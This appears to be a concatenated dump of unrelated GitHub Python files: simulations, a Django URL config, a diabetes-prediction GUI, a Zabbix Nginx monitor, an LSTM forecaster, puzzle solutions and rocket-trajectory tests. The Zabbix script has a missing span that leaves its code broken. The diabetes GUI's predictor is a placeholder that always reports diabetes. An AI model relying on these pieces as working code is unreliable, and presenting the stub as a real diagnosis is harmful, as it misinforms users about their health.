\"food\": self.food_stats[-1000:],\n \"meanSpeed\": self.meanspeed[-1000:]}\n df = pd.DataFrame(data)\n print(self.total_tick,self.total_tick % 1000)\n if self.total_tick == 1:\n print(\"Initialising CSV\")\n df.to_csv(f\"{self.csv_loc}/output.csv\", index=False , header=True)\n else:\n # print(\"Writing CSV\")\n df.to_csv(f\"{self.csv_loc}/output.csv\", mode='a', header=False, index=False)\n self.writtenwaiter = True\n\n\n if self.plotAnimation:\n ani = animation.FuncAnimation(fig, animate, frames=self.ticks*self.generations, interval=10)\n # set the window size for the animation\n fig.set_size_inches(20, 10)\n \n plt.show()\n\n \n\n\nsimulation = Simulation(\n width=100,\n height=100,\n initial_food=50,\n initial_creatures=5,\n food_energy=30,\n creature_avg_speed=15,\n creature_speed_variance=1,\n food_spawn_rate=1,\n ticks=100,\n generations=10,\n max_food=100,\n eat_radius=10,\n see_radius=50,\n plot = True,\n write_csv = True,\n csv_loc = \"D:/Simulations/outputs\"\n)\n\nsimulation.run()","repo_name":"shrihari256/evolving-simple-organisms","sub_path":"GPTgen/gptCode_Neural.py","file_name":"gptCode_Neural.py","file_ext":"py","file_size_in_byte":13449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"3349266475","text":"from django.urls import path\nfrom . import views\n\n\n\nurlpatterns = [\npath(\"\", views.home, name=\"home\"),\npath(\"create/\", views.create, name=\"create\"),\npath(\"/\", views.index, name=\"index\"),\npath(\"insertion/\", views.insertion,name=\"insertion\"),\npath(\"history/\", views.history,name=\"history\"),\npath(\"user/\", views.user,name=\"user\"),\npath(\"update/\", views.update,name=\"update\"),\n]\n\n# path(\"\", views.button),\n# path(\"switch/\", views.switch,name=\"switch\"),\n# path(\"pause/\", views.pauseinsertion,name=\"pause\"),\n# path(\"\", views.runmonitor)\n# url(r'^$', views.cur_time, name='time'),\n","repo_name":"yifanshi127/E-health-app","sub_path":"mysite/ehealth/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"41141493469","text":"import pandas as pd\nfrom sklearn.model_selection import train_test_split\nimport sys\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QLabel, QLineEdit, QPushButton, QMessageBox, QVBoxLayout, QWidget\n\n\ndef read_csv_dataset(filename, target_column, test_size=0.15, random_state=2):\n # Read the CSV file into a pandas DataFrame\n df = pd.read_csv(filename)\n\n # Separate features and target variable\n X = df.drop(target_column, axis=1)\n y = df[target_column]\n\n # Split the dataset into training and testing sets\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=test_size, random_state=random_state)\n\n # Convert DataFrame to lists\n X_train = X_train.values.tolist()\n X_test = X_test.values.tolist()\n y_train = y_train.tolist()\n y_test = y_test.tolist()\n\n # Return the training and testing sets as lists\n return X_train, X_test, y_train, y_test\n\n\n\nclass DiabetesPredictionWindow(QMainWindow):\n def __init__(self):\n super().__init__()\n\n self.setWindowTitle(\"Diabetes Prediction\")\n self.setGeometry(100, 100, 300, 300)\n\n # Create input labels and fields\n self.pregnancies_label = QLabel(\"Pregnancies:\")\n self.pregnancies_input = QLineEdit()\n\n self.glucose_label = QLabel(\"Glucose:\")\n self.glucose_input = QLineEdit()\n\n self.blood_pressure_label = QLabel(\"Blood Pressure:\")\n self.blood_pressure_input = QLineEdit()\n\n self.skin_thickness_label = QLabel(\"Skin Thickness:\")\n self.skin_thickness_input = QLineEdit()\n\n self.insulin_label = QLabel(\"Insulin:\")\n self.insulin_input = QLineEdit()\n\n self.bmi_label = QLabel(\"BMI:\")\n self.bmi_input = QLineEdit()\n\n self.diabetes_pedigree_label = QLabel(\"Diabetes Pedigree:\")\n self.diabetes_pedigree_input = QLineEdit()\n\n self.age_label = QLabel(\"Age:\")\n self.age_input = QLineEdit()\n\n # Create predict button\n self.predict_button = QPushButton(\"Predict\")\n self.predict_button.clicked.connect(self.predict)\n\n # Create layout and add input elements\n layout = QVBoxLayout()\n layout.addWidget(self.pregnancies_label)\n layout.addWidget(self.pregnancies_input)\n layout.addWidget(self.glucose_label)\n layout.addWidget(self.glucose_input)\n layout.addWidget(self.blood_pressure_label)\n layout.addWidget(self.blood_pressure_input)\n layout.addWidget(self.skin_thickness_label)\n layout.addWidget(self.skin_thickness_input)\n layout.addWidget(self.insulin_label)\n layout.addWidget(self.insulin_input)\n layout.addWidget(self.bmi_label)\n layout.addWidget(self.bmi_input)\n layout.addWidget(self.diabetes_pedigree_label)\n layout.addWidget(self.diabetes_pedigree_input)\n layout.addWidget(self.age_label)\n layout.addWidget(self.age_input)\n layout.addWidget(self.predict_button)\n\n # Create a central widget and set the layout\n central_widget = QWidget()\n central_widget.setLayout(layout)\n self.setCentralWidget(central_widget)\n\n # Apply stylesheet for visual enhancements\n self.setStyleSheet(\n \"\"\"\n QLabel {\n font-size: 14px;\n color: #333;\n }\n\n QLineEdit {\n font-size: 14px;\n padding: 6px;\n }\n\n QPushButton {\n font-size: 16px;\n padding: 10px;\n background-color: #4CAF50;\n color: white;\n border: none;\n }\n\n QPushButton:hover {\n background-color: #45a049;\n }\n \"\"\"\n )\n\n def predict(self):\n # Fetch input values\n pregnancies = float(self.pregnancies_input.text())\n glucose = float(self.glucose_input.text())\n blood_pressure = float(self.blood_pressure_input.text())\n skin_thickness = float(self.skin_thickness_input.text())\n insulin = float(self.insulin_input.text())\n bmi = float(self.bmi_input.text())\n diabetes_pedigree = float(self.diabetes_pedigree_input.text())\n age = float(self.age_input.text())\n\n # Apply your logistic regression model to predict diabetes here\n # Replace the following line with your model prediction code\n prediction = predict_diabetes(pregnancies, glucose, blood_pressure, skin_thickness,\n insulin, bmi, diabetes_pedigree, age)\n\n # Display the prediction result in a new window\n result_window = QMessageBox(self)\n result_window.setWindowTitle(\"PredictionResult\")\n\n if prediction == 1:\n result_window.setText(\"Prediction: Person has diabetes\")\n else:\n result_window.setText(\"Prediction: Person does not have diabetes\")\n\n result_window.exec_()\n\n\ndef predict_diabetes(pregnancies, glucose, blood_pressure, skin_thickness,\n insulin, bmi, diabetes_pedigree, age):\n # Implement your logistic regression model here\n # You can use your existing model or train a new one using a dataset\n # Replace the following return statement with your model's prediction\n return 1 # Replace this with your model's prediction\n\n","repo_name":"Roodaki/Diabetes-Predictor","sub_path":"IO.py","file_name":"IO.py","file_ext":"py","file_size_in_byte":5331,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"43063638348","text":"#!/usr/bin/python3\n\nimport urllib.request, urllib.parse, urllib.error, base64, re, struct, time, socket, datetime, os.path, argparse\n\ntry:\n import json\nexcept:\n import simplejson as json\n\n#####################################################################\n#\n# SETTINGS SECTION\n#\n#####################################################################\n\nzabbix_host = '127.0.0.1' # Zabbix server IP\nzabbix_port = 10051 # Zabbix server port\nhostname = 'Zabbix Agent' # Name of monitored host, like it is shown on Zabbix WebUI\ntime_delta = 1 # grep interval in minutes\n\n# URL to Nginx stat (http_stub_status_module)\nstat_url = 'http://localhost/nginx_stat'\n\n# Optional Basic Auth\nusername = 'user'\npassword = 'pass'\n\n#####################################################################\n#\n# DO NOT CHANGE BEYOND THIS POINT\n#\n#####################################################################\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"logfile\")\nargs = parser.parse_args()\n\nnginx_log_file_path = args.logfile\nfilename = os.path.basename(nginx_log_file_path)\n\n# Temp file, with log file cursor position\nseek_file = '/tmp/seek_'+filename\n\nclass Metric(object):\n def __init__(self, host, key, value, clock=None):\n self.host = host\n self.key = key\n self.value = value\n self.clock = clock\n\n def __repr__(self):\n if self.clock is None:\n return 'Metric(%r, %r, %r)' % (self.host, self.key, self.value)\n return 'Metric(%r, %r, %r, %r)' % (self.host, self.key, self.value, self.clock)\n\n\ndef send_to_zabbix(metrics, zabbix_host='127.0.0.1', zabbix_port=10051):\n metrics_data = []\n for m in metrics:\n clock = m.clock or ('%d' % time.time())\n data = {\n \"host\": m.host,\n \"key\": m.key,\n \"value\": m.value,\n \"clock\": clock\n }\n metrics_data.append(data)\n\n data_json = {\n \"request\": \"sender data\",\n \"data\": metrics_data\n }\n HEADER = \"ZBXD\\1\"\n data_json_str = json.dumps(data_json)\n data_len = len(data_json_str)\n data_header = struct.pack(' seek:\n nf.seek(seek)\n\nline = nf.readline()\nwhile line:\n if d in line:\n new_seek = nf.tell()\n total_rps += 1\n match = re.match(r'.*:(\\d+)\\s.*\"(\\w+)\\s.*\"\\s(\\d*)\\s.*(\\d+\\.\\d+)\\s(\\d+\\.\\d+)\\s\\.', line)\n sec = int(match.group(1))\n req = match.group(2)\n code = match.group(3)\n req_time[req].append(float(match.group(4))) if req in req_time else req_time['OTHER'].append(\n float(match.group(4)))\n res_time[req].append(float(match.group(5))) if req in res_time else res_time['OTHER'].append(\n float(match.group(4)))\n if code in res_code:\n res_code[code] += 1\n else:\n res_code[code] = 1\n\n rps[sec] += 1\n line = nf.readline()\n\nif total_rps != 0:\n write_seek(seek_file, str(new_seek))\n\nnf.close()\n\ndata_to_send = []\n\n# Adding the metrics to response\ndata = get(stat_url, username, password).decode().split('\\n')\ndata = parse_nginx_stat(data)\n\nfor i in data:\n data_to_send.append(Metric(hostname, ('nginx.%s[%s]' % (i, filename)), data[i]))\n\n# Adding the request per seconds to response\nfor t in range(0, 60):\n data_to_send.append(Metric(hostname, ('nginx.rps[%s]' % filename), rps[t], minute + t))\n\n# Adding the response codes stats to response\nfor t in res_code:\n data_to_send.append(Metric(hostname, ('nginx.responses[%s,%s]' % (filename, t)), res_code[t]))\n\n# Calculating the average request handling times and adding to response\nreq_time = {x: sum(req_time[x]) / float(len(req_time[x])) for x in req_time if len(req_time[x]) > 0}\nfor t in req_time:\n data_to_send.append(Metric(hostname, ('nginx.avg_req[%s,%s]' % (filename, t)), req_time[t]))\n\n# Calculating the average upstream response times and adding to response\nres_time = {x: sum(res_time[x]) / float(len(res_time[x])) for x in res_time if len(res_time[x]) > 0}\nfor t in res_time:\n data_to_send.append(Metric(hostname, ('nginx.avg_res[%s,%s]' % (filename, t)), res_time[t]))\n\nsend_to_zabbix(data_to_send, zabbix_host, zabbix_port)\n","repo_name":"lamaral/zbx_custom_templates","sub_path":"zbx_nginx_template/zbx_nginx_stats.py","file_name":"zbx_nginx_stats.py","file_ext":"py","file_size_in_byte":7319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33639468099","text":"import h5py\nimport os\nimport argparse\nimport numpy as np\nimport pandas as pd\nimport meshio\n\ndef main(folder):\n\n # Mesh\n mesh = meshio.read(\"../cell_meshes/bird/hole_coarse.xdmf\")\n\n # Simulated Data\n u_file = h5py.File(os.path.join(folder, \"u.h5\"), 'r')\n u_sim = u_file['VisualisationVector']['0'][()]\n u_sim = np.array(u_sim)\n u_sim_mag = np.sum(u_sim**2, axis=1)**0.5\n\n # Experimental data\n u_data = pd.read_csv(\"./output/single_field/coarse/interpolated_data.csv\", index_col=False)\n u_data = -1*u_data.loc[:,'u':'w'].to_numpy()\n u_data_mag = np.sum(u_data**2, axis=1)**0.5\n\n # Degradation\n degradation = np.zeros(u_sim.shape[0])\n discrepancy = u_data_mag-u_sim_mag\n max_d = np.max(discrepancy)\n # print(max_d)\n # degradation = discrepancy * 0.999/4\n\n Dmax = 0.9\n degradation = np.zeros(u_sim.shape[0])\n discrepancy = u_data_mag-u_sim_mag\n pos_ind = np.where(discrepancy>=0)[0] # underestimation\n dpos = discrepancy[pos_ind]\n neg_ind = np.where(discrepancy<0)[0] # overestimation\n dneg = discrepancy[neg_ind]\n\n degradation[pos_ind] = dpos * -0.5/5\n print(degradation)\n # degradation[neg_ind] = dneg_scaled\n degradation[neg_ind] = 0\n\n mesh_out = meshio.Mesh(\n mesh.points,\n mesh.cells,\n point_data = {\"degradation\":degradation}\n )\n\n mesh_out.write(\n os.path.join(folder, \"degradation.xdmf\")\n )\n\n np.savetxt(os.path.join(folder, \"degradation.txt\"), degradation)\n\nif __name__==\"__main__\":\n parser = argparse.ArgumentParser(description=\"Postprocessing\")\n parser.add_argument('directory', metavar='d', type=str,\n help=\"directory containing outputfiles\")\n\n args = parser.parse_args()\n main(args.directory)\n","repo_name":"jdsteinman/Gel-Model","sub_path":"cell_simulation/degradation.py","file_name":"degradation.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"35199902130","text":"import os\n\n#processing data\ndef process_data(array: list):\n lenght = len(array)\n array.sort()\n average = sum(array) / len(array)\n if lenght == 1:\n median = array[0]\n else:\n median = array[lenght // 2 + lenght % 2]\n quartil1 = array[lenght // 4]\n quartil3 = array[(lenght // 4) * 3]\n\n return average, array[0], quartil1, median, quartil3, array[lenght - 1]\n\n\nDATASETS = \"../dataset/\"\nfor directory in os.listdir(DATASETS):\n if directory != \"processed_data\":\n for subdirectory in os.listdir(f\"{DATASETS}{directory}\"):\n proc_data = []\n for file in os.listdir(f\"{DATASETS}{directory}/{subdirectory}\"):\n if \".txt\" in file:\n with open(f\"{DATASETS}{directory}/{subdirectory}/{file}\", 'r') as data:\n array_of_data = [int(rows.rstrip()) for rows in data]\n # print(file)\n proc_data.append([int(file[:-4]), process_data(array_of_data)])\n # print(proc_data)\n\n proc_data = sorted(proc_data, key=lambda x: x[0])\n # print(proc_data)\n with open(f\"{DATASETS}processed_data/{directory}_{subdirectory}.txt\", 'w') as outputfile:\n for proc in proc_data:\n #Write column of size of the input data\n outputfile.write(\"\".join(str(proc[0])) + \" \")\n #Write columns with these:\n #average, minimum, lowerquartile, median, upperquartile, maximum\n outputfile.write(\" \".join(map(str, proc[1])) + \"\\n\")","repo_name":"AleksandrKozyrnovD/Bauman_S2","sub_path":"scripts/make_preproc.py","file_name":"make_preproc.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2277484399","text":"import RPi.GPIO as GPIO\nimport sys\nfrom time import sleep\nGPIO.setmode(GPIO.BCM)\ndac = [26, 19, 13, 6, 5, 11, 9, 10]\nleds = [21, 20, 16, 12, 7, 8, 25, 24]\ncomp = 4\ntroyka = 17\nGPIO.setup(dac, GPIO.OUT)\nGPIO.setup(leds, GPIO.OUT)\nGPIO.setup(troyka, GPIO.OUT, initial = 1)\nGPIO.setup(comp, GPIO.IN)\n\ndef perevod(a):\n return[int(elem) for elem in bin(a)[2:].zfill(8)]\n\ndef adc():\n k = [0 for i in range(8)]\n for i in range(8):\n k_k = k.copy()\n k_k[i] = 1\n GPIO.output(dac, k_k)\n sleep(0.05)\n if GPIO.input(comp) == 1:\n k = k_k\n n = ''.join([str(i) for i in k])\n return int(n, 2)\n\ntry:\n while True:\n k = adc()\n print(k, \"{0:.2f}B\".format(int(k)/255 * 3.3))\n v = int(k)/255 * 3.3\n v = v / 3.28\n v = v * 8\n v = round(v)\n print(v)\n GPIO.output(leds, 0)\n for i in range(v):\n GPIO.output(leds[i], 1)\n\n\n\nfinally:\n GPIO.output(dac, 0)\n GPIO.cleanup()","repo_name":"KiraKolinko/get","sub_path":"5-3-adc-volume.py","file_name":"5-3-adc-volume.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12130941055","text":"__author__ = 'zyt'\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n # @param {ListNode} head\n # @return {ListNode}\n def reverseList(self, head):\n if not head:\n return None\n now = head.next\n head.next = None # must close the list !!\n while now:\n tail = now.next\n now.next = head\n head = now\n now = tail\n return head\n\nnode = ListNode(1)\n# node.next=ListNode(2)\nprint(Solution().reverseList(node))\n","repo_name":"zhuyingtao/leetcode","sub_path":"LeetCode_Python/Test206.py","file_name":"Test206.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14725063970","text":"# imports\nfrom pandas import read_csv\nimport numpy\nimport math\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import LSTM\nfrom sklearn.preprocessing import MinMaxScaler\n\n\n# convert an array of values into a dataset matrix\ndef create_dataset(dataset, look_back=1):\n dataX, dataY = [], []\n for i in range(len(dataset)-look_back-3):\n a = dataset[i:(i+look_back), 0]\n b = dataset[(i+look_back):(i+look_back+3), 0]\n dataX.append(a)\n dataY.append(b)\n return numpy.array(dataX), numpy.array(dataY)\n\n\n# code starts from here\ndataframe = read_csv('real_data.csv', usecols=[1], engine='python')\ndataset = dataframe.values\ndataset = dataset.astype('float32')\nprint(dataset)\n\n# scaler\nscaler = MinMaxScaler(feature_range=(0, 1))\ndataset = scaler.fit_transform(dataset)\n\n# split into train and test sets\ntrain_size = int(len(dataset) * 0.67)\ntest_size = len(dataset) - train_size\ntrain, test = dataset[0:train_size, :], dataset[train_size:len(dataset), :]\nprint(len(train), len(test))\n\n\n# reshape into X=t and Y=t+1\nlook_back = 3\ntrainX, trainY = create_dataset(train, look_back)\nprint('trainY: ',trainY)\ntestX, testY = create_dataset(test, look_back)\n\n# reshape input to be [samples, time steps, features]\ntrainX = numpy.reshape(trainX, (trainX.shape[0], 1, trainX.shape[1]))\ntestX = numpy.reshape(testX, (testX.shape[0], 1, testX.shape[1]))\n\n# create and fit the LSTM network\nmodel = Sequential()\nmodel.add(LSTM(100, input_shape=(1, look_back)))\nmodel.add(Dense(3))\nmodel.compile(loss='mean_squared_error', optimizer='adam')\nmodel.fit(trainX, trainY, epochs=100, batch_size=1, verbose=2)\n\nmodel.save('new_lstm.h5')\n\n# make predictions\ntrainPredict = model.predict(trainX)\ntestPredict = model.predict(testX)\n# invert predictions\ntestPredict = scaler.inverse_transform(testPredict)\n\nprint(testPredict)\n\n","repo_name":"nuwanjkit/timeseries_multiple_output_lstm","sub_path":"lstm_me.py","file_name":"lstm_me.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"72617532967","text":"def occurences(food_list):\n '''\n Get ingredient with allergen occurences, ingredient occurences, and allergen occurences.\n\n Both ingredient with allergen occurences and allergen occurences\n will be used to identify ingredients without allergens.\n\n Ingredient occurences will be used to sum number of times\n ingredients without allergens appear in any food.\n '''\n ingredient_occurences = {}\n allergen_occurences = {}\n ingredient_allergen_occurences = {}\n\n for food in food_list:\n if '(' in food:\n ingredients, allergens = food.split(' (')\n allergens = allergens.replace('contains ', '').replace(')', '').split(', ')\n\n for a in allergens:\n allergen_occurences.setdefault(a, 0)\n allergen_occurences[a] += 1\n\n else:\n ingredients, allergens = food, []\n\n ingredients = ingredients.split(' ')\n\n for i in ingredients:\n allergen_count = ingredient_allergen_occurences.setdefault(i, {})\n\n for a in allergens:\n allergen_count.setdefault(a, 0)\n allergen_count[a] += 1\n\n ingredient_occurences.setdefault(i, 0)\n ingredient_occurences[i] += 1\n\n return ingredient_allergen_occurences, ingredient_occurences, allergen_occurences\n\n\ndef ingredients_without_allergens(ingredients_and_allergen, allergen_occurences):\n '''\n For any tentative allergen per ingredient,\n if said allergen's occurence doesn't match the total allergen's occurences,\n said ingredient likely isn't an allergen.\n So we pop said allergen from said ingredient's tentative allergen occurence.\n\n Example: if ingredient 'asdasdasd' has {'dairy': 1} and allergen_occurences['dairy'] == 3,\n likely 'asdasdasd' isn't a dairy allergen.\n So we pop 'dairy' from the tentative allergen occurence of 'asdasdasd'\n\n If the ingredient ends up without any allergen occurences, append to no_allergens.\n '''\n\n no_allergens = []\n\n for i, a in ingredients_and_allergen.items():\n for allergen, count in allergen_occurences.items():\n if allergen in a and a[allergen] != count:\n a.pop(allergen)\n\n if not a:\n no_allergens.append(i)\n\n return no_allergens\n\n\ndef sort_ingredients_by_allergen(ingredients_and_allergen, without_allergens):\n\n # Remove ingredients without allergens\n # from the original ingredients_and_allergen\n for i in no_allergens:\n ingredients_and_allergen.pop(i)\n\n # The allergen occurence isn't important,\n # so make it a list of allergens instead\n for i, a in ingredients_and_allergen.items():\n ingredients_and_allergen[i] = list(a.keys())\n\n # As per instruction, each allergen is only found in one ingredient\n # and ingredients have 0 or 1 allergen(s).\n # General concept:\n # Loop through each ingredient and get the allergens.\n # If only one allergen, remove said allergen from\n # the possible allergens in other ingredients.\n # Let's hope this works.\n while not all(len(a) == 1 for a in ingredients_and_allergen.values()):\n for i, a in ingredients_and_allergen.items():\n if len(a) == 1:\n ingredient = a[0]\n for i2, a in ingredients_and_allergen.items():\n if i != i2 and ingredient in a:\n a.remove(ingredient)\n\n return ','.join(sorted(ingredients_and_allergen.keys(), key=lambda i: ingredients_and_allergen[i][0]))\n\nif __name__ == '__main__':\n test = [\n 'mxmxvkd kfcds sqjhc nhms (contains dairy, fish)',\n 'trh fvjkl sbzzf mxmxvkd (contains dairy)',\n 'sqjhc fvjkl (contains soy)',\n 'sqjhc mxmxvkd sbzzf (contains fish)'\n ]\n\n ingredients_and_allergen, ingredient_occurences, allergen_occurences = occurences(test)\n no_allergens = ingredients_without_allergens(\n ingredients_and_allergen, allergen_occurences\n )\n assert sum(c for i, c in ingredient_occurences.items() if i in no_allergens) == 5\n\n assert sort_ingredients_by_allergen(ingredients_and_allergen, no_allergens) == 'mxmxvkd,sqjhc,fvjkl'\n\n with open('inputs/day21.txt') as f:\n food_list = [l.strip() for l in f.readlines() if l.strip()]\n ingredients_and_allergen, ingredient_occurences, allergen_occurences = occurences(food_list)\n no_allergens = ingredients_without_allergens(\n ingredients_and_allergen, allergen_occurences\n )\n\n assert sum(c for i, c in ingredient_occurences.items() if i in no_allergens) == 2075\n assert sort_ingredients_by_allergen(ingredients_and_allergen, no_allergens) == 'zfcqk,mdtvbb,ggdbl,frpvd,mgczn,zsfzq,kdqls,kktsjbh'\n\n","repo_name":"dnswrsrx/adventofcode2k20","sub_path":"day21.py","file_name":"day21.py","file_ext":"py","file_size_in_byte":4694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9345674600","text":"import unittest\nfrom collections import namedtuple\n\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\n\nimport openmdao.api as om\nfrom openmdao.utils.assert_utils import assert_near_equal\nfrom openmdao.utils.testing_utils import use_tempdirs, require_pyoptsparse\n\nfrom dymos.examples.water_rocket.phases import (new_water_rocket_trajectory,\n set_sane_initial_guesses)\n\n\n@require_pyoptsparse(optimizer='IPOPT')\n@use_tempdirs\nclass TestWaterRocketForDocs(unittest.TestCase):\n\n def test_water_rocket_height_for_docs(self):\n import dymos as dm\n p = om.Problem(model=om.Group())\n\n traj, phases = new_water_rocket_trajectory(objective='height')\n traj = p.model.add_subsystem('traj', traj)\n\n p.driver = om.pyOptSparseDriver(optimizer='IPOPT', print_results=False)\n p.driver.opt_settings['print_level'] = 0\n p.driver.opt_settings['max_iter'] = 500\n p.driver.opt_settings['mu_strategy'] = 'monotone'\n p.driver.declare_coloring(tol=1.0E-12)\n\n # Finish Problem Setup\n p.model.linear_solver = om.DirectSolver()\n\n p.setup()\n set_sane_initial_guesses(p, phases)\n\n dm.run_problem(p, run_driver=True, simulate=True)\n\n summary = summarize_results(p)\n for key, entry in summary.items():\n print(f'{key}: {entry.value:6.4f} {entry.unit}')\n\n exp_out = traj.simulate(times_per_seg=10)\n\n # NOTE: only the last figure is shown in the generated docs\n plot_propelled_ascent(p, exp_out)\n plot_trajectory(p, exp_out)\n plot_states(p, exp_out)\n\n # plt.show()\n\n # Check results (tolerance is relative unless value is zero)\n assert_near_equal(summary['Launch angle'].value, 85, 0.01)\n assert_near_equal(summary['Empty mass'].value, 0.144, 0.01)\n assert_near_equal(summary['Water volume'].value, 0.98, 0.01)\n assert_near_equal(summary['Maximum height'].value, 53.5, 0.01)\n\n def test_water_rocket_range_for_docs(self):\n p = om.Problem(model=om.Group())\n\n traj, phases = new_water_rocket_trajectory(objective='range')\n traj = p.model.add_subsystem('traj', traj)\n\n p.driver = om.pyOptSparseDriver(optimizer='IPOPT')\n p.driver.opt_settings['print_level'] = 0\n p.driver.opt_settings['max_iter'] = 300\n p.driver.opt_settings['mu_strategy'] = 'monotone'\n p.driver.declare_coloring(tol=1.0E-12)\n\n # Finish Problem Setup\n p.model.linear_solver = om.DirectSolver()\n\n p.setup()\n set_sane_initial_guesses(p, phases)\n\n p.run_driver()\n\n summary = summarize_results(p)\n for key, entry in summary.items():\n print(f'{key}: {entry.value:6.4f} {entry.unit}')\n\n exp_out = traj.simulate(times_per_seg=10)\n\n # NOTE: only the last figure is shown in the generated docs\n plot_propelled_ascent(p, exp_out)\n plot_trajectory(p, exp_out)\n plot_states(p, exp_out)\n\n # plt.show()\n\n # Check results (tolerance is relative unless value is zero)\n assert_near_equal(summary['Launch angle'].value, 46, 0.02)\n assert_near_equal(summary['Flight angle at end of propulsion'].value, 38, 0.02)\n assert_near_equal(summary['Empty mass'].value, 0.189, 1e-2)\n assert_near_equal(summary['Water volume'].value, 1.026, 1e-2)\n assert_near_equal(summary['Maximum range'].value, 85.11, 1e-2)\n assert_near_equal(summary['Maximum height'].value, 23.08, 1e-2)\n assert_near_equal(summary['Maximum velocity'].value, 41.31, 1e-2)\n\n\ndef plot_trajectory(p, exp_out):\n fig, axes = plt.subplots(nrows=1, ncols=1, figsize=(6, 8))\n\n time_imp = {'ballistic_ascent': p.get_val('traj.ballistic_ascent.timeseries.time'),\n 'propelled_ascent': p.get_val('traj.propelled_ascent.timeseries.time'),\n 'descent': p.get_val('traj.descent.timeseries.time')}\n\n time_exp = {'ballistic_ascent': exp_out.get_val('traj.ballistic_ascent.timeseries.time'),\n 'propelled_ascent': exp_out.get_val('traj.propelled_ascent.timeseries.time'),\n 'descent': exp_out.get_val('traj.descent.timeseries.time')}\n\n r_imp = {'ballistic_ascent': p.get_val('traj.ballistic_ascent.timeseries.r'),\n 'propelled_ascent': p.get_val('traj.propelled_ascent.timeseries.r'),\n 'descent': p.get_val('traj.descent.timeseries.r')}\n\n r_exp = {'ballistic_ascent': exp_out.get_val('traj.ballistic_ascent.timeseries.r'),\n 'propelled_ascent': exp_out.get_val('traj.propelled_ascent.timeseries.r'),\n 'descent': exp_out.get_val('traj.descent.timeseries.r')}\n\n h_imp = {'ballistic_ascent': p.get_val('traj.ballistic_ascent.timeseries.h'),\n 'propelled_ascent': p.get_val('traj.propelled_ascent.timeseries.h'),\n 'descent': p.get_val('traj.descent.timeseries.h')}\n\n h_exp = {'ballistic_ascent': exp_out.get_val('traj.ballistic_ascent.timeseries.h'),\n 'propelled_ascent': exp_out.get_val('traj.propelled_ascent.timeseries.h'),\n 'descent': exp_out.get_val('traj.descent.timeseries.h')}\n\n axes.plot(r_imp['propelled_ascent'], h_imp['propelled_ascent'], 'ro', markerfacecolor='None')\n axes.plot(r_imp['ballistic_ascent'], h_imp['ballistic_ascent'], 'mo', markerfacecolor='None')\n axes.plot(r_imp['descent'], h_imp['descent'], 'bo', markerfacecolor='None')\n\n axes.plot(r_exp['propelled_ascent'], h_exp['propelled_ascent'], 'r-')\n axes.plot(r_exp['ballistic_ascent'], h_exp['ballistic_ascent'], 'm-')\n axes.plot(r_exp['descent'], h_exp['descent'], 'b-')\n\n axes.set_xlabel('r (m)')\n axes.set_ylabel('h (m)')\n axes.set_aspect('equal', 'box')\n\n fig.tight_layout()\n\n\ndef plot_states(p, exp_out):\n fig, axes = plt.subplots(nrows=4, ncols=1, figsize=(4, 8), sharex=True)\n\n states = ['r', 'h', 'v', 'gam']\n units = ['m', 'm', 'm/s', 'deg']\n phases = ['propelled_ascent', 'ballistic_ascent', 'descent']\n\n time_imp = {'ballistic_ascent': p.get_val('traj.ballistic_ascent.timeseries.time'),\n 'propelled_ascent': p.get_val('traj.propelled_ascent.timeseries.time'),\n 'descent': p.get_val('traj.descent.timeseries.time')}\n\n time_exp = {'ballistic_ascent': exp_out.get_val('traj.ballistic_ascent.timeseries.time'),\n 'propelled_ascent': exp_out.get_val('traj.propelled_ascent.timeseries.time'),\n 'descent': exp_out.get_val('traj.descent.timeseries.time')}\n\n x_imp = {phase: {state: p.get_val(f\"traj.{phase}.timeseries.{state}\", unit)\n for state, unit in zip(states, units)\n }\n for phase in phases\n }\n\n x_exp = {phase: {state: exp_out.get_val(f\"traj.{phase}.timeseries.{state}\", unit)\n for state, unit in zip(states, units)\n }\n for phase in phases\n }\n\n for i, (state, unit) in enumerate(zip(states, units)):\n axes[i].set_ylabel(f\"{state} ({unit})\" if state != 'gam' else f'$\\gamma$ ({unit})')\n\n axes[i].plot(time_imp['propelled_ascent'], x_imp['propelled_ascent'][state], 'ro', markerfacecolor='None')\n axes[i].plot(time_imp['ballistic_ascent'], x_imp['ballistic_ascent'][state], 'mo', markerfacecolor='None')\n axes[i].plot(time_imp['descent'], x_imp['descent'][state], 'bo', markerfacecolor='None')\n axes[i].plot(time_exp['propelled_ascent'], x_exp['propelled_ascent'][state], 'r-', label='Propelled Ascent')\n axes[i].plot(time_exp['ballistic_ascent'], x_exp['ballistic_ascent'][state], 'm-', label='Ballistic Ascent')\n axes[i].plot(time_exp['descent'], x_exp['descent'][state], 'b-', label='Descent')\n\n if state == 'gam':\n axes[i].yaxis.set_major_locator(mpl.ticker.MaxNLocator(nbins='auto', steps=[1, 1.5, 3, 4.5, 6, 9, 10]))\n axes[i].set_yticks(np.arange(-90, 91, 45))\n\n axes[i].set_xlabel('t (s)')\n axes[0].legend()\n\n fig.tight_layout()\n\n\ndef 